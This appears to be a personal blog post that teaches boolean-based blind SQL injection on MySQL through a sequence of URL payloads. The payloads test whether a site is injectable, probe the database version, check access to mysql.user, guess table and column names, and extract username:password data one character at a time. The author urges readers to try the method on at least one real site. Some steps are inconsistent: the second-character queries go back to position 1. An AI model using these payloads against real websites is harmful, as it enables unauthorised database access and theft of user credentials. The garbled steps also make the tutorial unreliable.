Hello i am back with a good news that i got a job :) Lets continue with my previous article about SQL Injection
here i am explaining you about blind sqli . its a time taking injection because here you will have to guess many thing, it means that you shud have a good guessing power as well as luck :).
BLIND SQL INJECTION :-
I think here i need to write definition of blind injection. so i am copying it from wikipedia . here is the definition : http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection
Testing IF target is vulnerable to mysql blind :-
=> http://targetsite.com/news.php?id=5 and 1=1
^ as this is always true & page loads normally :))
=> http://test.com/news.php?id=5 and 1=2
^ this one is False :P So if some text, picture or some content is missing on returned page then that site is vulnerable to blind sql injection.
Getting Mysql version in blind sqli to get the version in blind attack we use substring i.e
=> http://targetsite.com/news.php?id=5 and substring(@@version,1,1)=4
^ this should return TRUE if the version of MySQL is 4.(replace 4 with 5, and if query return TRUE then the version is 5).
Now test if subselect works (when select don't work then we use subselect)
i.e
=> http://targetsite.com/news.php?id=5 and (select 1)=1
^ if page loads normally then subselects work.
Now, Let's see if we have access to => Mysql.user
=> http://targetsite.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can fetch some password using load_file() function and OUTFILE.
Check table and column names :-
# Guessing work starts that is,
=> http://targetsite.com/news.php?id=5 and (select 1 from users limit 0,1)=1
^(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row,this is very important, then if the page loads normally without content missing, the table users exits. If you get FALSE (OR some content missing), just change table name until you guess the right one :). Let's say that I have found that table name is users, now what we need is column name !! :D
# The same as table name, we start guessing.
=> http://targetsite.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
#if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
Fetch data from database :-
I found table users i columns username password so I'm gonna pull characters from that.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here fetches the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with symbol greater then " >" . So if the ascii char greater then 80, the page loads normally. TRUE
>> keep trying until get false.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
# we get TRUE, keep incrementing
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, increment
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
got FALSE!!!
So the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.
=>> then let's check the second character.
# http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
# Note that i'hv changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
# FALSE, lower number.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
# TRUE, increment.
http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
# FALSE!!!
# we know that the second character is char(105) and that is 'i'. We have 'ci' so far
# so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end and we have got that data which we wanted from the table.
I know that this injection is really boring and tuff . So try hacking using this method atleast one site else there are many tools which helps u in blind SQLI , You can use them also.
Wait for my next article :)
sanjeev
No comments:
Post a Comment